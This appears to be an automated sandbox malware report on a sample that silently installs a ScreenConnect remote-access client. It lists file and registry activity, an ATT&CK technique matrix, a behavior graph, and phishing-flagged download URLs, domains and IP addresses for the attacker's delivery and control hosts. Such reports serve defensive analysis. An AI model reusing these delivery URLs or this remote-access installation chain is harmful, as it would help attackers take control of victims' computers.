                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FF848F23642 CreateNamedPipeW,10_2_00007FF848F23642
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeCode function: 0_2_00F51806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00F51806
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.12.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.12.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.12.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\pzPO97QouM.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 5.0.ScreenConnect.WindowsClient.exe.dd0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.3886946834.000002350032E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.2472709033.0000000003190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 7120, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 4140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 3652, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, type: DROPPED
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  21
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API
                  1
                  DLL Search Order Hijacking
                  1
                  DLL Search Order Hijacking
                  1
                  Obfuscated Files or Information
                  LSASS Memory2
                  File and Directory Discovery
                  Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter
                  2
                  Windows Service
                  2
                  Windows Service
                  1
                  Install Root Certificate
                  Security Account Manager65
                  System Information Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job
                  1
                  Scheduled Task/Job
                  13
                  Process Injection
                  1
                  Timestomp
                  NTDS71
                  Security Software Discovery
                  Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Bootkit
                  1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  LSA Secrets2
                  Process Discovery
                  SSHKeylogging3
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Search Order Hijacking
                  Cached Domain Credentials71
                  Virtualization/Sandbox Evasion
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                  Masquerading
                  DCSync1
                  Application Window Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Modify Registry
                  Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt71
                  Virtualization/Sandbox Evasion
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron13
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Users
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
                  Bootkit
                  KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1551436 Sample: pzPO97QouM.exe Startdate: 07/11/2024 Architecture: WINDOWS Score: 60 48 pick09y.top 2->48 50 molatoriism.icu 2->50 52 2 other IPs or domains 2->52 62 Antivirus detection for URL or domain 2->62 64 .NET source code references suspicious native API functions 2->64 66 Detected potential unwanted application 2->66 68 2 other signatures 2->68 9 ScreenConnect.ClientService.exe 2 4 2->9         started        13 pzPO97QouM.exe 2 2->13         started        15 svchost.exe 1 1 2->15         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 56 pick09y.top 62.182.85.100, 49848, 8880 YANINA-ASUA Ukraine 9->56 78 Reads the Security eventlog 9->78 80 Reads the System eventlog 9->80 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 131 107 13->24         started        28 WerFault.exe 13->28         started        58 127.0.0.1 unknown unknown 15->58 30 WerFault.exe 17->30         started        signatures6 process7 dnsIp8 70 Creates files in the system32 config directory 19->70 72 Contains functionality to hide user accounts 19->72 54 molatoriism.icu 172.67.182.214, 443, 49705, 49708 CLOUDFLARENETUS United States 24->54 38 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->38 dropped 40 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->40 dropped 42 ScreenConnect.WindowsBackstageShell.exe, PE32 24->42 dropped 46 13 other files (none is malicious) 24->46 dropped 32 ScreenConnect.WindowsClient.exe 19 10 24->32         started        44 C:\ProgramData\Microsoft\...\Report.wer, Unicode 28->44 dropped file9 signatures10 process11 signatures12 60 Contains functionality to hide user accounts 32->60 35 ScreenConnect.ClientService.exe 1 3 32->35         started        process13 signatures14 74 Contains functionality to hide user accounts 35->74 76 Enables network access during safeboot for specific services 35->76

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\9HP74NEM.JXX\PEW92W31.XQ2\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applications_l0899100%Avira URL Cloudphishing
                  http://www.w3.(0%Avira URL Cloudsafe
                  https://molatoriism.icu/Bin/ScreenConnect.Wind100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.manifestU0E0MDk2U0hBMzg0MjAyMUNBMS5jcnQwDAYDVR0TAQH100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applications_34e089Y100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.config100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Core.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Suppb/100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationanifestInformati100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationz.100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationdb01RReJz3iq4100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationX100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application_100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config(100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe100%Avira URL Cloudphishing
                  https://logilive.com/ppsecure/InlineClient0%Avira URL Cloudsafe
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicatio100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationosoft100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applications100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configF100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configU100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsC100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=pick09y.top&p=8880&100%Avira URL Cloudphishing
                  https://molatoriism.icu100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllA0100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dllkg100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exet100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applications_e089100%Avira URL Cloudphishing
                  http://Passport.80%Avira URL Cloudsafe
                  https://molatoriism.icu/Bin/ScreenConnect.Client.applicationIEluYy4xQTA/BgNV100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.application#ScreenConne100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Client.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dlld100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.Windows.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientSe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exe100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.ClientService.dll100%Avira URL Cloudphishing
                  https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exen100%Avira URL Cloudphishing
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  pick09y.top
                  62.182.85.100
                  truefalse
                    unknown
                    molatoriism.icu
                    172.67.182.214
                    truefalse
                      unknown
                      fp2e7a.wpc.phicdn.net
                      192.229.221.95
                      truefalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        https://molatoriism.icu/Bin/ScreenConnect.WindowsFileManager.exefalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.Core.dllfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exe.configfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.WindowsClient.exefalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.ClientService.exefalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.Client.dllfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.Windows.dllfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://molatoriism.icu/Bin/ScreenConnect.ClientService.dllfalse
                        • Avira URL Cloud: phishing
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://molatoriism.icu/Bin/ScreenConnect.Winddfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: phishing
                        unknown
                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000003.00000003.2114884995.00000133B09A0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                          high
                          https://molatoriism.icu/Bin/ScreenConnect.Client.applications_l0899dfsvc.exe, 00000001.00000002.3912891196.000002356F465000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfhsvchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000000D.00000003.2502073556.000001D224B4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3886752397.000001D224240000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2502160772.000001D224B63000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-svchost.exe, 0000000D.00000002.3887561203.000001D224B5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://molatoriism.icu/Bin/ScreenConnect.dfsvc.exe, 00000001.00000002.3886946834.000002350046F000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://molatoriism.icu/Bin/ScreenConnect.Client.applications_34e089YScreenConnect.WindowsClient.exe, 00000005.00000002.2472112800.0000000001378000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAsvchost.exe, 0000000D.00000002.3887410161.000001D224B00000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
